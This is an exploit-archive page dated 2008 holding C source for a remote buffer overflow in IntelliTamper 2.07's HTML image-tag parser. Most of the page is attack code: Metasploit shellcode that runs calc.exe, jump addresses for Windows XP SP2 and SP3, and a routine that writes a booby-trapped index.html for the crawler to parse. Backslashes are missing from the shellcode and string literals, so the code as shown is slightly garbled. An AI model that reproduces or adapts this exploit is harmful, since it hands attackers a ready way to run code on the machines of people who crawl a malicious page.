[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
# Published : 2008-08-03
# Author : r0ut3r
# Previous Title : IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
# Next Title : NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
/*
* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit
*
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)
* Many Thanks to Luigi Auriemma (http://aluigi.org)
*
* Greets to shinnai (http://www.shinnai.net)
* and Guido Landi
*
* IntelliTamper contains a remote buffer overflow vulnerability.
* The HTML parser, more precise the image tag fails to preform
* boundary checks on supplied data.
*
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
* [!] OS: Microsoft Windows XP Pro SP 2
* [+] Building payload
* [+] Inserting JMP code
* [+] Success writing to index.html
* kit:/home/r0ut3r/public_html/imgsrc-xpl #
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* win32_exec - EXITFUNC=thread CMD=c:windowssystem32calc.exe Size=184
Encoder=PexFnstenvSub http://metasploit.com
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
unsigned char shellcode[] =
"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"
"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"
"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"
"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"
"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"
"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"
"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"
"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"
"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"
"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"
"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"
"xfaxc5xe8x12xfcxebx8dx6a";
#define JMP 0xe9 //JMP
int main(int argc, char* argv[])
{
FILE *fd;
unsigned char buff[4000],
*jmpref,
*p;
int opt;
struct
{
char *os;
unsigned int eip;
} targets[] =
{
"Microsoft Windows XP Pro SP 2",
0x7d040e1f,
"Microsoft Windows XP Pro SP 3",
0x7c8369f0
};
if (argc < 2)
{
printf("---------------------------------------------------------n");
printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit nn");
printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");
printf(" Thanks to Luigi Auriemma (http://aluigi.org)nn");
printf(" Usage: %s <OS-type>n", argv[0]);
printf(" 0: Microsoft Windows XP Pro SP2n");
printf(" 1: Microsoft Windows XP Pro SP3n");
printf("---------------------------------------------------------n");
return 1;
}
p = buff;
switch (atoi(argv[1]))
{
case 0:
opt = 0;
printf("[!] OS: %sn", targets[0].os);
break;
case 1:
opt = 1;
printf("[!] OS: %sn", targets[1].os);
break;
}
printf("[+] Building payloadn");
p += sprintf(p, "<img src="http://");
jmpref = p;
p += sprintf(p, "%s", shellcode);
int i;
int a = 3065 - (p - jmpref);
for (i=0; i < a; i++)
*p++ = 'A';
*(unsigned int *) p = targets[opt].eip;
p += 4;
printf("[+] Inserting JMP coden");
*p++ = JMP;
*(unsigned int *) p = jmpref - (p + 4); //JMP -(3065+4+5)
p += 4;
p += sprintf(p, "">");
fd = fopen("index.html", "wb");
if (fd == NULL)
{
perror("[-] Failed opening index.htmln");
return 1;
}
fwrite(buff, 1, p - buff, fd);
if (fclose(fd) == 0)
printf("[+] Success writing to index.htmln");
else
printf("[-] Failed writing to index.htmln");
return 0;
}
// www.Syue.com [2008-08-03]